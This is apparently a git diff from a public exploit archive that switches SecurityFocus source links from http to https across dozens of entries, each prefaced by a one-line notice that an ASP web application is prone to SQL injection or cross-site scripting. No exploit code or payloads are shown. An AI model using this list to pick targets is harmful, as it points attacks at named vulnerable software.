@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20335/info +source: https://www.securityfocus.com/bid/20335/info ASPPlayground.NET Forum Advanced Edition is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/28762.txt b/exploits/asp/webapps/28762.txt index 0897c04a1..850603f97 100644 --- a/exploits/asp/webapps/28762.txt +++ b/exploits/asp/webapps/28762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20354/info +source: https://www.securityfocus.com/bid/20354/info Civica is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/28768.html b/exploits/asp/webapps/28768.html index 510f41bc1..c3d112eef 100644 --- a/exploits/asp/webapps/28768.html +++ b/exploits/asp/webapps/28768.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20378/info +source: https://www.securityfocus.com/bid/20378/info Emek Portal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28829.txt b/exploits/asp/webapps/28829.txt index 1abd3bdc8..497b6f96c 100644 --- a/exploits/asp/webapps/28829.txt +++ b/exploits/asp/webapps/28829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20607/info +source: https://www.securityfocus.com/bid/20607/info Kinesis Interactive Cinema System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/28857.txt b/exploits/asp/webapps/28857.txt index e8f55492d..1cea3e001 100644 --- a/exploits/asp/webapps/28857.txt +++ b/exploits/asp/webapps/28857.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20712/info +source: https://www.securityfocus.com/bid/20712/info Snitz Forums 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/28869.txt b/exploits/asp/webapps/28869.txt index d63e1945b..99cba7244 100644 --- a/exploits/asp/webapps/28869.txt +++ b/exploits/asp/webapps/28869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20778/info +source: https://www.securityfocus.com/bid/20778/info Web Wiz Forum is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28878.txt b/exploits/asp/webapps/28878.txt index 4bc884869..a48eeacc5 100644 --- a/exploits/asp/webapps/28878.txt +++ b/exploits/asp/webapps/28878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20803/info +source: https://www.securityfocus.com/bid/20803/info Easy notesManager is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/28879.txt b/exploits/asp/webapps/28879.txt index 5f813ae84..dd6277a6d 100644 --- a/exploits/asp/webapps/28879.txt +++ b/exploits/asp/webapps/28879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20803/info +source: https://www.securityfocus.com/bid/20803/info Easy notesManager is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/28941.txt b/exploits/asp/webapps/28941.txt index c8229b2ba..6aaefe9e5 100644 --- a/exploits/asp/webapps/28941.txt +++ b/exploits/asp/webapps/28941.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20965/info +source: https://www.securityfocus.com/bid/20965/info Immediacy CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28985.txt b/exploits/asp/webapps/28985.txt index 69a7a3a56..a316074a3 100644 --- a/exploits/asp/webapps/28985.txt +++ b/exploits/asp/webapps/28985.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21036/info +source: https://www.securityfocus.com/bid/21036/info 20/20 Real Estate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/28986.asp b/exploits/asp/webapps/28986.asp index 7009b52b4..8ae1e96ea 100644 --- a/exploits/asp/webapps/28986.asp +++ b/exploits/asp/webapps/28986.asp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21039/info +source: https://www.securityfocus.com/bid/21039/info ASP Portal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28989.txt b/exploits/asp/webapps/28989.txt index 39a89d533..f681ae795 100644 --- a/exploits/asp/webapps/28989.txt +++ b/exploits/asp/webapps/28989.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28990.txt b/exploits/asp/webapps/28990.txt index 0ce73072d..8c85d26f2 100644 --- a/exploits/asp/webapps/28990.txt +++ b/exploits/asp/webapps/28990.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28991.txt b/exploits/asp/webapps/28991.txt index e1190b0fc..d977ca865 100644 --- a/exploits/asp/webapps/28991.txt +++ b/exploits/asp/webapps/28991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28992.txt b/exploits/asp/webapps/28992.txt index fc8cb84e4..bb9ccc6b0 100644 --- a/exploits/asp/webapps/28992.txt +++ b/exploits/asp/webapps/28992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28993.txt b/exploits/asp/webapps/28993.txt index b042766c8..6853cb119 100644 --- a/exploits/asp/webapps/28993.txt +++ b/exploits/asp/webapps/28993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28994.txt b/exploits/asp/webapps/28994.txt index d9453ffbb..9a97035d2 100644 --- a/exploits/asp/webapps/28994.txt +++ b/exploits/asp/webapps/28994.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29008.txt b/exploits/asp/webapps/29008.txt index b90e1878a..f90cb7d84 100644 --- a/exploits/asp/webapps/29008.txt +++ b/exploits/asp/webapps/29008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21055/info +source: https://www.securityfocus.com/bid/21055/info FunkyASP Glossary is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29009.txt b/exploits/asp/webapps/29009.txt index eadef6434..fcf4bbf56 100644 --- a/exploits/asp/webapps/29009.txt +++ b/exploits/asp/webapps/29009.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21056/info +source: https://www.securityfocus.com/bid/21056/info SitesOutlet Ecommerce Kit is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29010.txt b/exploits/asp/webapps/29010.txt index 0b62d760e..ba2d87a41 100644 --- a/exploits/asp/webapps/29010.txt +++ b/exploits/asp/webapps/29010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21059/info +source: https://www.securityfocus.com/bid/21059/info SiteXpress E-Commerce System is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29011.txt b/exploits/asp/webapps/29011.txt index 728023636..442d80742 100644 --- a/exploits/asp/webapps/29011.txt +++ b/exploits/asp/webapps/29011.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21061/info +source: https://www.securityfocus.com/bid/21061/info ASPIntranet is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29012.txt b/exploits/asp/webapps/29012.txt index cedd21c80..b0886ca59 100644 --- a/exploits/asp/webapps/29012.txt +++ b/exploits/asp/webapps/29012.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21064/info +source: https://www.securityfocus.com/bid/21064/info DMXReady Site Engine Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29013.txt b/exploits/asp/webapps/29013.txt index c070dab00..8925c19f3 100644 --- a/exploits/asp/webapps/29013.txt +++ b/exploits/asp/webapps/29013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21065/info +source: https://www.securityfocus.com/bid/21065/info Pilot Cart is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29014.txt b/exploits/asp/webapps/29014.txt index 967ce64b8..d587e09de 100644 --- a/exploits/asp/webapps/29014.txt +++ b/exploits/asp/webapps/29014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21066/info +source: https://www.securityfocus.com/bid/21066/info Car Site Manager is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29015.txt b/exploits/asp/webapps/29015.txt index 44b7c2a2e..bca2ae427 100644 --- a/exploits/asp/webapps/29015.txt +++ b/exploits/asp/webapps/29015.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21066/info +source: https://www.securityfocus.com/bid/21066/info Car Site Manager is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29016.txt b/exploits/asp/webapps/29016.txt index 35ae79874..9d361000c 100644 --- a/exploits/asp/webapps/29016.txt +++ b/exploits/asp/webapps/29016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21066/info +source: https://www.securityfocus.com/bid/21066/info Car Site Manager is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29024.txt b/exploits/asp/webapps/29024.txt index 4677e5b27..5749e063a 100644 --- a/exploits/asp/webapps/29024.txt +++ b/exploits/asp/webapps/29024.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21069/info +source: https://www.securityfocus.com/bid/21069/info Inventory Manager is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29025.txt b/exploits/asp/webapps/29025.txt index 2f74919ef..c05517497 100644 --- a/exploits/asp/webapps/29025.txt +++ b/exploits/asp/webapps/29025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21070/info +source: https://www.securityfocus.com/bid/21070/info Evolve Merchant is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29028.txt b/exploits/asp/webapps/29028.txt index be945c1eb..72fde268d 100644 --- a/exploits/asp/webapps/29028.txt +++ b/exploits/asp/webapps/29028.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21073/info +source: https://www.securityfocus.com/bid/21073/info MGinternet Property Site Manager is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29029.txt b/exploits/asp/webapps/29029.txt index 250016568..1a3f6fd4c 100644 --- a/exploits/asp/webapps/29029.txt +++ b/exploits/asp/webapps/29029.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21073/info +source: https://www.securityfocus.com/bid/21073/info MGinternet Property Site Manager is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29030.txt b/exploits/asp/webapps/29030.txt index 4db92857b..633bcf0d5 100644 --- a/exploits/asp/webapps/29030.txt +++ b/exploits/asp/webapps/29030.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21073/info +source: https://www.securityfocus.com/bid/21073/info MGinternet Property Site Manager is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29031.txt b/exploits/asp/webapps/29031.txt index ff67947c0..da5dbced5 100644 --- a/exploits/asp/webapps/29031.txt +++ b/exploits/asp/webapps/29031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21073/info +source: https://www.securityfocus.com/bid/21073/info MGinternet Property Site Manager is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29037.txt b/exploits/asp/webapps/29037.txt index f2f157d4c..f2964d619 100644 
--- a/exploits/asp/webapps/29037.txt +++ b/exploits/asp/webapps/29037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21090/info +source: https://www.securityfocus.com/bid/21090/info CandyPress Store is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29038.txt b/exploits/asp/webapps/29038.txt index 330f982eb..f9272aced 100644 --- a/exploits/asp/webapps/29038.txt +++ b/exploits/asp/webapps/29038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21090/info +source: https://www.securityfocus.com/bid/21090/info CandyPress Store is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29040.txt b/exploits/asp/webapps/29040.txt index 67b2ec6a8..19e16e664 100644 --- a/exploits/asp/webapps/29040.txt +++ b/exploits/asp/webapps/29040.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21093/info +source: https://www.securityfocus.com/bid/21093/info High Performance Computers Solutions Shopping Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29041.txt b/exploits/asp/webapps/29041.txt index 352c613b2..bdacb836f 100644 --- a/exploits/asp/webapps/29041.txt +++ b/exploits/asp/webapps/29041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21096/info +source: https://www.securityfocus.com/bid/21096/info Helm is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29042.txt b/exploits/asp/webapps/29042.txt index 57093b5ce..04cafe5e6 100644 --- a/exploits/asp/webapps/29042.txt +++ b/exploits/asp/webapps/29042.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21098/info +source: https://www.securityfocus.com/bid/21098/info Dragon Event Listing is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29043.txt b/exploits/asp/webapps/29043.txt index a6e7286d8..06adf9a65 100644 --- a/exploits/asp/webapps/29043.txt +++ b/exploits/asp/webapps/29043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21098/info +source: https://www.securityfocus.com/bid/21098/info Dragon Event Listing is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29044.txt b/exploits/asp/webapps/29044.txt index 6f4d2ccd4..029b3af3f 100644 --- a/exploits/asp/webapps/29044.txt +++ b/exploits/asp/webapps/29044.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21098/info +source: https://www.securityfocus.com/bid/21098/info Dragon Event Listing is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29046.txt b/exploits/asp/webapps/29046.txt index e962dd395..aa601065f 100644 --- a/exploits/asp/webapps/29046.txt +++ b/exploits/asp/webapps/29046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21105/info +source: https://www.securityfocus.com/bid/21105/info ASPIntranet is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29048.txt b/exploits/asp/webapps/29048.txt index 2ab3d6181..ea3d379e4 100644 --- a/exploits/asp/webapps/29048.txt +++ b/exploits/asp/webapps/29048.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21122/info +source: https://www.securityfocus.com/bid/21122/info The i-gallery application is prone to multiple-input validation vulnerabilities, including multiple cross-site scripting vulnerabilities and an HTML-injection issue, because the software fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29053.txt b/exploits/asp/webapps/29053.txt index f31a8b844..c8df40e6d 100644 --- a/exploits/asp/webapps/29053.txt +++ b/exploits/asp/webapps/29053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21131/info +source: https://www.securityfocus.com/bid/21131/info Image gallery with Access Database is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29054.txt b/exploits/asp/webapps/29054.txt index 6e6c48260..cdae6b976 100644 --- a/exploits/asp/webapps/29054.txt +++ b/exploits/asp/webapps/29054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21131/info +source: https://www.securityfocus.com/bid/21131/info Image gallery with Access Database is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29063.txt b/exploits/asp/webapps/29063.txt index 86750be28..018afe987 100644 --- a/exploits/asp/webapps/29063.txt +++ b/exploits/asp/webapps/29063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21138/info +source: https://www.securityfocus.com/bid/21138/info Xtreme ASP Photo Gallery is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues and an HTML-injection issue because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29064.txt b/exploits/asp/webapps/29064.txt index a29aafb44..606160ae4 100644 
--- a/exploits/asp/webapps/29064.txt +++ b/exploits/asp/webapps/29064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21138/info +source: https://www.securityfocus.com/bid/21138/info Xtreme ASP Photo Gallery is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues and an HTML-injection issue because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29073.txt b/exploits/asp/webapps/29073.txt index 6fc31b5f7..4e6e5c59a 100644 --- a/exploits/asp/webapps/29073.txt +++ b/exploits/asp/webapps/29073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21152/info +source: https://www.securityfocus.com/bid/21152/info ASPCart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29074.txt b/exploits/asp/webapps/29074.txt index d2ca516ec..051d77e27 100644 --- a/exploits/asp/webapps/29074.txt +++ b/exploits/asp/webapps/29074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21153/info +source: https://www.securityfocus.com/bid/21153/info 20/20 Real Estate is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29075.txt b/exploits/asp/webapps/29075.txt index 9cc9d907b..165cc3130 100644 --- a/exploits/asp/webapps/29075.txt +++ b/exploits/asp/webapps/29075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21154/info +source: https://www.securityfocus.com/bid/21154/info 20/20 Auto Gallery is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29077.txt b/exploits/asp/webapps/29077.txt index ddbd5ea92..9d266fa83 100644 --- a/exploits/asp/webapps/29077.txt 
+++ b/exploits/asp/webapps/29077.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21156/info +source: https://www.securityfocus.com/bid/21156/info 20/20 DataShed is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29078.txt b/exploits/asp/webapps/29078.txt index d981db4cc..bb1b909a2 100644 --- a/exploits/asp/webapps/29078.txt +++ b/exploits/asp/webapps/29078.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21156/info +source: https://www.securityfocus.com/bid/21156/info 20/20 DataShed is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29080.txt b/exploits/asp/webapps/29080.txt index 5c45cc111..5d875979c 100644 --- a/exploits/asp/webapps/29080.txt +++ b/exploits/asp/webapps/29080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21158/info +source: https://www.securityfocus.com/bid/21158/info BestWebApp Dating Site is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29081.txt b/exploits/asp/webapps/29081.txt index e71490ef2..7f897ad06 100644 --- a/exploits/asp/webapps/29081.txt +++ b/exploits/asp/webapps/29081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21158/info +source: https://www.securityfocus.com/bid/21158/info BestWebApp Dating Site is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29084.txt b/exploits/asp/webapps/29084.txt index 74bb1c84d..f79f6c9e1 100644 --- a/exploits/asp/webapps/29084.txt +++ b/exploits/asp/webapps/29084.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21166/info +source: https://www.securityfocus.com/bid/21166/info A-Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29085.txt b/exploits/asp/webapps/29085.txt index c874a9cc7..ad197efe5 100644 --- a/exploits/asp/webapps/29085.txt +++ b/exploits/asp/webapps/29085.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21166/info +source: https://www.securityfocus.com/bid/21166/info A-Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29086.txt b/exploits/asp/webapps/29086.txt index 0fe02344e..7a22f7ca3 100644 --- a/exploits/asp/webapps/29086.txt +++ b/exploits/asp/webapps/29086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21167/info +source: https://www.securityfocus.com/bid/21167/info Active News Manger is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29087.txt b/exploits/asp/webapps/29087.txt index 081299c3a..9b3f4556a 100644 --- a/exploits/asp/webapps/29087.txt +++ b/exploits/asp/webapps/29087.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21167/info +source: https://www.securityfocus.com/bid/21167/info Active News Manger is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29088.txt b/exploits/asp/webapps/29088.txt index d33cb6a30..144812e20 100644 --- a/exploits/asp/webapps/29088.txt +++ b/exploits/asp/webapps/29088.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21167/info +source: https://www.securityfocus.com/bid/21167/info Active News Manger is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29089.txt b/exploits/asp/webapps/29089.txt index 2a624e59f..cb13b76ff 100644 --- a/exploits/asp/webapps/29089.txt +++ b/exploits/asp/webapps/29089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21167/info +source: https://www.securityfocus.com/bid/21167/info Active News Manger is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29090.txt b/exploits/asp/webapps/29090.txt index 28cca864f..ff107d269 100644 --- a/exploits/asp/webapps/29090.txt +++ b/exploits/asp/webapps/29090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21167/info +source: https://www.securityfocus.com/bid/21167/info Active News Manger is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29093.txt b/exploits/asp/webapps/29093.txt index 29a2a614d..7fc6502e7 100644 --- a/exploits/asp/webapps/29093.txt +++ b/exploits/asp/webapps/29093.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21168/info +source: https://www.securityfocus.com/bid/21168/info ClickTech Texas Rank'em is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29094.txt b/exploits/asp/webapps/29094.txt index a7f3247eb..3652665ed 100644 --- a/exploits/asp/webapps/29094.txt 
+++ b/exploits/asp/webapps/29094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21168/info +source: https://www.securityfocus.com/bid/21168/info ClickTech Texas Rank'em is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29103.txt b/exploits/asp/webapps/29103.txt index 9c411a262..984df8b6c 100644 --- a/exploits/asp/webapps/29103.txt +++ b/exploits/asp/webapps/29103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21190/info +source: https://www.securityfocus.com/bid/21190/info vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29104.txt b/exploits/asp/webapps/29104.txt index f37fecc40..f1150e756 100644 --- a/exploits/asp/webapps/29104.txt +++ b/exploits/asp/webapps/29104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21190/info +source: https://www.securityfocus.com/bid/21190/info vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29105.txt b/exploits/asp/webapps/29105.txt index 990edf153..6a87086b6 100644 --- a/exploits/asp/webapps/29105.txt +++ b/exploits/asp/webapps/29105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21190/info +source: https://www.securityfocus.com/bid/21190/info vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29106.txt b/exploits/asp/webapps/29106.txt index 5747cafc2..555e34287 100644 
--- a/exploits/asp/webapps/29106.txt +++ b/exploits/asp/webapps/29106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21190/info +source: https://www.securityfocus.com/bid/21190/info vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29107.txt b/exploits/asp/webapps/29107.txt index 800b18c5c..d04d0420b 100644 --- a/exploits/asp/webapps/29107.txt +++ b/exploits/asp/webapps/29107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29108.txt b/exploits/asp/webapps/29108.txt index b253dc402..a02cec3e5 100644 --- a/exploits/asp/webapps/29108.txt +++ b/exploits/asp/webapps/29108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29109.txt b/exploits/asp/webapps/29109.txt index 00ca902c0..6af841eae 100644 --- a/exploits/asp/webapps/29109.txt +++ b/exploits/asp/webapps/29109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. 
